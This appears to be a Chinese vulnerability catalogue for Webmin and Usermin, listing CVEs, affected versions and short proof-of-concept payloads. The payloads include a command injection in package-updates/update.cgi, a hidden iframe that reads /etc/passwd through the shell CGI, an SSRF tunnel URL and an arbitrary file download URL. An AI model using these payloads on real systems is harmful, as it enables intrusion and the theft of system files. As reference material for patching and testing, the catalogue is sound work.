zoukankan      html  css  js  c++  java

  • 应用安全

    简介

    开发语言
PHP

    用途
    系统管理

     

    CVE-2019-15642

    Date
    2019.7

    类型
    远程代码执行

    影响范围
    Webmin <= 1.920

    复现
    POC|EXP
    OBJECT Socket;print "Content-Type: text/plain

";$cmd='id'; print "$cmd

";
     

    分析

    反序列化导致远程代码执行

    CVE-2019-15107

    Date
2019

类型
远程代码执行
    
影响范围

    Webmin <= 1.920

    前置条件
    /password_change.cgi可访问

    复现
    POC | EXP


    
分析

    CVE-2019-12840

    Date
2019.6

类型
远程代码执行

影响范围
v 1.910

复现
    POC|EXP
    (1)
    POST: https://url/package-updates/update.cgi 
    Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
    mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
    (2)
    POST: https://url/package-updates/update.cgi 
    Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages
    

分析

    XSS vulnerability that leads to Remote Code Execution

    Date
2017

类型
XSS导致远程代码执行

影响范围
Webmin version 1.850

    前置条件
    /at/create_job.cgi可访问
     

    CSRF

    Date
2017

类型
CSRF

影响范围
Webmin version 1.850

    SSRF

    Date
2017

类型
SSRF

    影响范围
Webmin version     1.850

    复现
    POC|EXP
    https://xx.org:8443/tunnel/link.cgi/https://baidu.com

    HTML Email Command Execution Vulnerability

    Date

类型
远程命令执行

影响范围
    Usermin versions <= 1.080
    
复现
POC    |EXP
<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv
ictim&history=' height=0 width=0></iframe>

    任意文件下载

    Date
2004

类型
任意文件下载

影响范围
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
    DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
    DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0
    
前置条件
    /dansguardian/edit.cgi 可访问

复现
POC|EXP
    https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]
  • 相关阅读:
    Android: ListView与Button的共存问题解决
    Android DatePickerDialog和TimePickerDialog显示样式
    Android日期操作
    android 8种对话框(Dialog)使用方法汇总
    FastJson将json解析成含有泛型对象,内部泛型对象再次解析出错的解决办法(Android)
    Android中解析JSON格式数据常见方法合集
    java使用json-lib库的json工具类.
    EditText限制输入的几种方式及只显示中文汉字的做法
    android:layout_gravity和android:gravity属性的区别
    1.0 Android基础入门教程
  • 原文地址:https://www.cnblogs.com/AtesetEnginner/p/12055981.html
Copyright © 2011-2022 走看看